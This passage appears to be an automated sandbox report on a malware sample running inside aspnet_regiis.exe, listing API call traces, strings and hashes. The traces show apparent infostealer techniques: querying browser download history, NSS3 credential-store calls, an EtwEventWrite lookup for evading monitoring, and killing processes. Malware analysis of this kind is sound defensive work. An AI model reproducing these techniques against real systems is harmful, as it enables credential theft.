                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F2E6
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A0F320
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                              • API String ID: 3404309857-4289949731
                                                                                                                                                                              • Opcode ID: bf90613f61fbf687d7ed574022966d10e28f6da752e1bb9432d00f8e28439d30
                                                                                                                                                                              • Instruction ID: da6ff4dce36e1cc4c5296e1f728a289b319df907751da00040e42bd2c346ac53
                                                                                                                                                                              • Opcode Fuzzy Hash: bf90613f61fbf687d7ed574022966d10e28f6da752e1bb9432d00f8e28439d30
                                                                                                                                                                              • Instruction Fuzzy Hash: 7711C271300602AFDB24DF6CE9C0A59B3A6FF483247540559F826EBA82CF70E985CB91
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A094AB
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A094C6
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                              • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                              • API String ID: 2500673778-2241552939
                                                                                                                                                                              • Opcode ID: 4de3e59d7c96bd14281313896d742448e583ee4583545dd042ba6c5701a3d115
                                                                                                                                                                              • Instruction ID: bf60aaf8e7c2736ba4fafff57ad7aedafdb4ced3ffb3b247faef06ca99d0aec6
                                                                                                                                                                              • Opcode Fuzzy Hash: 4de3e59d7c96bd14281313896d742448e583ee4583545dd042ba6c5701a3d115
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B71C931D80229ABDF01FFA4EE859DEB776BF04351B514421F910B71A0DF60AE598FA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB94F1C), ref: 6CBA8EA2
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CBCF854
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CBCF868
                                                                                                                                                                                • Part of subcall function 6CBCF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CBCF882
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(04C483FF,?,?), ref: 6CBCF889
                                                                                                                                                                                • Part of subcall function 6CBCF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CBCF8A4
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CBCF8AB
                                                                                                                                                                                • Part of subcall function 6CBCF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CBCF8C9
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(280F10EC,?,?), ref: 6CBCF8D0
                                                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB94F1C), ref: 6CBA8EC3
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB94F1C), ref: 6CBA8EDC
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA8EF1
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBA8F20
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1978757487-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _freemalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3576935931-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CC15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CC15B56
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CC12CEC
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CC12D02
                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CC12D1F
                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CC12D42
                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CC12D5B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CB93090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CBAAE42), ref: 6CB930AA
                                                                                                                                                                                • Part of subcall function 6CB93090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB930C7
                                                                                                                                                                                • Part of subcall function 6CB93090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB930E5
                                                                                                                                                                                • Part of subcall function 6CB93090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB93116
                                                                                                                                                                                • Part of subcall function 6CB93090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB9312B
                                                                                                                                                                                • Part of subcall function 6CB93090: PK11_DestroyObject.NSS3(?,?), ref: 6CB93154
                                                                                                                                                                                • Part of subcall function 6CB93090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB9317E
                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CB899FF,?,?,?,?,?,?,?,?,?,6CB82D6B,?), ref: 6CBAAE67
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CB899FF,?,?,?,?,?,?,?,?,?,6CB82D6B,?), ref: 6CBAAE7E
                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB82D6B,?,?,00000000), ref: 6CBAAE89
                                                                                                                                                                              • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CB82D6B,?,?,00000000), ref: 6CBAAE96
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CB82D6B,?,?), ref: 6CBAAEA3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 754562246-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __getptd.LIBCMT ref: 02A26725
                                                                                                                                                                                • Part of subcall function 02A24954: __getptd_noexit.LIBCMT ref: 02A24957
                                                                                                                                                                                • Part of subcall function 02A24954: __amsg_exit.LIBCMT ref: 02A24964
                                                                                                                                                                              • __getptd.LIBCMT ref: 02A2673C
                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 02A2674A
                                                                                                                                                                              • __lock.LIBCMT ref: 02A2675A
                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 02A2676E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A1009A
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC0D
                                                                                                                                                                                • Part of subcall function 02A2EBF8: __CxxThrowException@8.LIBCMT ref: 02A2EC22
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC33
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A10139
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A1014D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                              • API String ID: 2448322171-3788999226
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CB16D36
                                                                                                                                                                              Strings
                                                                                                                                                                              • database corruption, xrefs: 6CB16D2A
                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB16D20
                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB16D2F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC4CC7B), ref: 6CC4CD7A
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC4CD8E
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC4CDA5
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC4CDB8
                                                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CC4CCB5
                                                                                                                                                                              • memcpy.VCRUNTIME140(6CCE14F4,6CCE02AC,00000090), ref: 6CC4CCD3
                                                                                                                                                                              • memcpy.VCRUNTIME140(6CCE1588,6CCE02AC,00000090), ref: 6CC4CD2B
                                                                                                                                                                                • Part of subcall function 6CB69AC0: socket.WSOCK32(?,00000017,6CB699BE), ref: 6CB69AE6
                                                                                                                                                                                • Part of subcall function 6CB69AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CB699BE), ref: 6CB69AFC
                                                                                                                                                                                • Part of subcall function 6CB70590: closesocket.WSOCK32(6CB69A8F,?,?,6CB69A8F,00000000), ref: 6CB70597
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F282
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC0D
                                                                                                                                                                                • Part of subcall function 02A2EBF8: __CxxThrowException@8.LIBCMT ref: 02A2EC22
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC33
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F28D
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02A12301,?), ref: 02A11D6C
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A11D73
                                                                                                                                                                              • wsprintfW.USER32 ref: 02A11D84
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateProcesswsprintf
                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                              • API String ID: 769748085-2783943728
                                                                                                                                                                              • Opcode ID: 19cee1cb64a815336a386bfde7617bf4cd1eb44d40d0b592527d4c5bb3ac06d1
                                                                                                                                                                              • Instruction ID: ca5e9fe346f811151b04b0911f97de652dfd923e82d360d2442bfcd9dad32e39
                                                                                                                                                                              • Opcode Fuzzy Hash: 19cee1cb64a815336a386bfde7617bf4cd1eb44d40d0b592527d4c5bb3ac06d1
                                                                                                                                                                              • Instruction Fuzzy Hash: D1D0A731BC031477D61027D5AC0EF9A7F2CEB02BA2F000420FB0ED6140DD71842547D9
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02A01402
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A0140D
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02A01416
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsCreateDeviceRelease
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 1843228801-865373369
                                                                                                                                                                              • Opcode ID: 831414297057cffbed2ec567c1f12d2674e41fec2723601a19170158bd93ff06
                                                                                                                                                                              • Instruction ID: ebfca89f2d7e14c79427384411bcf5c35cc3b8a6db1668625712742eb2c14639
                                                                                                                                                                              • Opcode Fuzzy Hash: 831414297057cffbed2ec567c1f12d2674e41fec2723601a19170158bd93ff06
                                                                                                                                                                              • Instruction Fuzzy Hash: C8D01235BC030477F1741650BC4FF2A2A24E7D6F02F200404F303580C04EB054139636
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02A018BA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 02A018CB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: EtwEventWrite$ntdll.dll
                                                                                                                                                                              • API String ID: 1646373207-1851843765
                                                                                                                                                                              • Opcode ID: 6bed3f81de2052526ad3448989ff5d276d611be43a120f090bcdaa3ff0c3c4c9
                                                                                                                                                                              • Instruction ID: b046af4595da0f5abb43219252e0015bc0cd1f36c8c975329465198061eba391
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bed3f81de2052526ad3448989ff5d276d611be43a120f090bcdaa3ff0c3c4c9
                                                                                                                                                                              • Instruction Fuzzy Hash: 94B09271B80210A7BE016FB56DCDE873B5A7A42B023800884B68BC0402EFB4C8269610
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B0C6
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B27C
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B297
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0B2E9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                              • Opcode ID: daece7cc4878d952c2e13fe05f2efcc2e38689e96b689e8ff95bad085b9caa65
                                                                                                                                                                              • Instruction ID: 3abe98a86c26f742c360e9b18a110d02e7addd2b54f10832c3b6a39e61c2affe
                                                                                                                                                                              • Opcode Fuzzy Hash: daece7cc4878d952c2e13fe05f2efcc2e38689e96b689e8ff95bad085b9caa65
                                                                                                                                                                              • Instruction Fuzzy Hash: C981EB32D802299BDF01FBA4EE85ADDB776BF04364F514521E900B71A0DF70AE598FA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,76F883C0,00000000,?,?,?,?,?,?,02A1C58F,?,02A16F27,?), ref: 02A1C019
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,02A1C58F,?,02A16F27), ref: 02A1C049
                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,02A1C58F,?,02A16F27,?), ref: 02A1C075
                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,02A1C58F,?,02A16F27,?), ref: 02A1C083
                                                                                                                                                                                • Part of subcall function 02A1B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,09ED2488), ref: 02A1B9C5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3986731826-0
                                                                                                                                                                              • Opcode ID: 08186477a8ee992325ca08092450566c0bb8d095432af61f7809b3f182f05e7c
                                                                                                                                                                              • Instruction ID: 91f9f6e6fdfb808ae146a96585e481946c73ab0982697b01e50ce948e29917e9
                                                                                                                                                                              • Opcode Fuzzy Hash: 08186477a8ee992325ca08092450566c0bb8d095432af61f7809b3f182f05e7c
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C417A71840209DFCF10DF69C880AAEBBF9FF48324F10056AE855EB256EB309546CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • malloc.MSVCRT ref: 02A1BDC5
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A1BDD9
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A1BE26
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,66FDBAB5,?,00000000,09ED2488,?,00000001,09ED2488,?,02A1AE6B,?,00000001,09ED2488,66FDBAB5,?), ref: 02A1BE45
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$FileWritemalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 803809635-0
                                                                                                                                                                              • Opcode ID: e157d5475cc4e0a7052f7b5ce452651333287ae3055a11e16681000b6e699449
                                                                                                                                                                              • Instruction ID: 17f0f19de976e4f729f1486c30a0b7469140370076a413a5041db48dd81f23bd
                                                                                                                                                                              • Opcode Fuzzy Hash: e157d5475cc4e0a7052f7b5ce452651333287ae3055a11e16681000b6e699449
                                                                                                                                                                              • Instruction Fuzzy Hash: CA314C75600704AFD725CF65DA80BA6B7F9FB44768B40892EEA4687A40DF70F9048F60
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A122D7
                                                                                                                                                                                • Part of subcall function 02A11D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02A12301,?), ref: 02A11D6C
                                                                                                                                                                                • Part of subcall function 02A11D61: RtlAllocateHeap.NTDLL(00000000), ref: 02A11D73
                                                                                                                                                                                • Part of subcall function 02A11D61: wsprintfW.USER32 ref: 02A11D84
                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 02A1237D
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 02A1238B
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A12392
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4082384872-0
                                                                                                                                                                              • Opcode ID: c1854ba10e36de482462c0b7fea371a006056e2c9a8fa8288146469271426191
                                                                                                                                                                              • Instruction ID: 985a21f88e38ae23cc2e791356410aca4c358ea203fecdd05a888bb25871694c
                                                                                                                                                                              • Opcode Fuzzy Hash: c1854ba10e36de482462c0b7fea371a006056e2c9a8fa8288146469271426191
                                                                                                                                                                              • Instruction Fuzzy Hash: 95310F72A41228AFDB219FA4DD84AEE77BDEB0A354F0404A5E909A2540DB309F858F52
                                                                                                                                                                              APIs
                                                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6CBAACC2
                                                                                                                                                                                • Part of subcall function 6CB82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB82F0A
                                                                                                                                                                                • Part of subcall function 6CB82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB82F1D
